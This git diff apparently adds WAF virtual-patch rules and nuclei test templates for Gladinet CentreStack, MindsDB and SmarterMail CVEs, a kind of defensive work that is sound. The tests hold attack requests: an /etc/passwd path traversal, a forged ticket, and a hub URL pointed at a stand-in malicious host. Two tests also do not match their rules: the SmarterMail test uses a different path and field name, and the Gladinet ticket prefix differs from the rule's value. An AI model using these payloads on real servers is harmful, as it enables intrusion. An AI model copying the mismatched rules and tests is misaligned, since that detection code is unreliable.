diff --git a/.appsec-tests/CVE-2025-14611/CVE-2025-14611.yaml b/.appsec-tests/CVE-2025-14611/CVE-2025-14611.yaml new file mode 100644 index 00000000000..4162bd2f021 --- /dev/null +++ b/.appsec-tests/CVE-2025-14611/CVE-2025-14611.yaml @@ -0,0 +1,17 @@ +id: CVE-2025-14611 +info: + name: CVE-2025-14611 + author: crowdsec + severity: info + description: CVE-2025-14611 testing + tags: appsec-testing +http: + - method: GET + path: + - "{{BaseURL}}/storage/filesvr.dn?t=vghpi7etozudizddsublh3mtz2acli8zra5aopvx4teexlziueqnyfsrx7dsd3p5l6eiyydig8lvm0o41mgbariwrk0wt6jlb" + + cookie-reuse: true + matchers: + - type: status + status: + - 403 diff --git a/.appsec-tests/CVE-2025-14611/config.yaml b/.appsec-tests/CVE-2025-14611/config.yaml new file mode 100644 index 00000000000..e1e32a95294 --- /dev/null +++ b/.appsec-tests/CVE-2025-14611/config.yaml @@ -0,0 +1,4 @@ +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2025-14611.yaml +nuclei_template: CVE-2025-14611.yaml diff --git a/.appsec-tests/CVE-2025-68472/CVE-2025-68472.yaml b/.appsec-tests/CVE-2025-68472/CVE-2025-68472.yaml new file mode 100644 index 00000000000..dcac1760205 --- /dev/null +++ b/.appsec-tests/CVE-2025-68472/CVE-2025-68472.yaml @@ -0,0 +1,21 @@ +id: CVE-2025-68472 +info: + name: CVE-2025-68472 + author: crowdsec + severity: info + description: CVE-2025-68472 testing + tags: appsec-testing +http: + - raw: + - | + PUT /api/files/leak_rel HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"file": "../../../../../etc/passwd"} + + cookie-reuse: true + matchers: + - type: status + status: + - 403 diff --git a/.appsec-tests/CVE-2025-68472/config.yaml b/.appsec-tests/CVE-2025-68472/config.yaml new file mode 100644 index 00000000000..2dd4c66cea7 --- /dev/null +++ b/.appsec-tests/CVE-2025-68472/config.yaml @@ -0,0 +1,4 @@ +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2025-68472.yaml +nuclei_template: CVE-2025-68472.yaml diff --git a/.appsec-tests/CVE-2026-24423/CVE-2026-24423.yaml b/.appsec-tests/CVE-2026-24423/CVE-2026-24423.yaml new file mode 100644 index 00000000000..a0d3ad179f6 --- /dev/null +++ b/.appsec-tests/CVE-2026-24423/CVE-2026-24423.yaml @@ -0,0 +1,21 @@ +id: CVE-2026-24423 +info: + name: CVE-2026-24423 + author: crowdsec + severity: info + description: CVE-2026-24423 testing + tags: appsec-testing +http: + - raw: + - | + POST /api/v1/settings/system/connect-to-hub HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"hubUrl":"http://malicious.server/","hubToken":"test"} + + cookie-reuse: true + matchers: + - type: status + status: + - 403 diff --git a/.appsec-tests/CVE-2026-24423/config.yaml b/.appsec-tests/CVE-2026-24423/config.yaml new file mode 100644 index 00000000000..0efa23c6f11 --- /dev/null +++ b/.appsec-tests/CVE-2026-24423/config.yaml @@ -0,0 +1,4 @@ +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2026-24423.yaml +nuclei_template: CVE-2026-24423.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-14611.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-14611.yaml new file mode 100644 index 00000000000..1e3f945f797 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-14611.yaml @@ -0,0 +1,33 @@ +name: crowdsecurity/vpatch-CVE-2025-14611 +description: 'Detects Gladinet CentreStack/Triofox LFI via known hardcoded encryption key tickets' +rules: + - and: + - zones: + - URI + transform: + - lowercase + - urldecode + match: + type: contains + value: '/storage/filesvr.dn' + - zones: + - ARGS + variables: + - t + transform: + - lowercase + match: + type: contains + value: 'vghpi7etozudizddrpsub' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'Gladinet CentreStack - LFI' + classification: + - cve.CVE-2025-14611 + - attack.T1190 + - cwe.CWE-321 diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-68472.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-68472.yaml new file mode 100644 index 00000000000..d9479cea958 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-68472.yaml @@ -0,0 +1,34 @@ +name: crowdsecurity/vpatch-CVE-2025-68472 +description: 'Detects MindsDB path traversal via file parameter in file upload API' +rules: + - and: + - zones: + - URI + transform: + - lowercase + - urldecode + match: + type: contains + value: '/api/files/' + - zones: + - BODY_ARGS + variables: + - json.file + transform: + - lowercase + - urldecode + match: + type: contains + value: '..' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'MindsDB - Path Traversal' + classification: + - cve.CVE-2025-68472 + - attack.T1190 + - cwe.CWE-22 diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2026-24423.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2026-24423.yaml new file mode 100644 index 00000000000..eac76ed2eb9 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2026-24423.yaml @@ -0,0 +1,33 @@ +name: crowdsecurity/vpatch-CVE-2026-24423 +description: 'Detects SmarterMail ConnectToHub RCE via malicious hubAddress parameter' +rules: + - and: + - zones: + - URI + transform: + - lowercase + - urldecode + match: + type: contains + value: '/api/v1/settings/sysadmin/connect-to-hub' + - zones: + - BODY_ARGS + variables: + - json.hubaddress + transform: + - lowercase + match: + type: regex + value: 'https?://' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'SmarterMail - RCE' + classification: + - cve.CVE-2026-24423 + - attack.T1190 + - cwe.CWE-306